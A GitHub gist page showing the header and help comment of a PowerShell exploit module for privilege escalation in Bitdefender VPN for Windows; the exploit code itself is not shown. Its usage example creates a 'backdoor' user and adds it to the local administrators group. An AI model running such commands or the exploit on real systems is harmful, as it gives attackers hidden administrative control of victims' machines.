Skip to content

Instantly share code, notes, and snippets.

View Will-777's full-sized avatar

Skel - William Touzalin Will-777

View GitHub Profile
@ykoster
ykoster / Invoke-ExploitBdVpnLpe.psm1
Created January 31, 2020 22:35
Exploit module for Bitdefender VPN for Windows
<#
.Synopsis
Exploit module for Bitdefender VPN for Windows
.Parameter Command
Command(s) to be executed when openvpn.exe is started
.Example
Import-Module .\Invoke-ExploitBdVpnLpe.psm1
Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add"